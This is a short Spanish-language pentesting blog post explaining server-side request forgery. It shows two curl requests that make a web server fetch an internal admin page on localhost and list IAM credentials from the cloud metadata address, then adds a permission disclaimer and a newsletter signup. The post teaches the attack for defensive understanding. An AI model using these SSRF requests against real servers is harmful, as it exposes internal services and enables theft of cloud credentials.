~ / blog / pentesting
KALI

SSRF: usa el servidor de proxy

En un SSRF, engañas al servidor para que haga peticiones por ti, hacia donde tú no llegas.

Si una web trae una URL que tú controlas, la apuntas a sus servicios internos, como localhost, o a rangos privados que desde internet no ves. En la nube, es aún peor: apuntas al servicio de metadatos y puedes robar credenciales del servidor.

El servidor confía en sí mismo, y tú abusas de esa confianza.

# los comandos

kali@kali:~$ curl 'http://10.0.0.5/fetch?url=http://127.0.0.1:8080/admin'copiar
<title>Panel Admin Interno</title> <- acceso interno!
kali@kali:~$ curl 'http://10.0.0.5/fetch?url=http://169.254.169.254/latest/meta-data/iam/'copiar
security-credentials/rol-web <- credenciales cloud
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.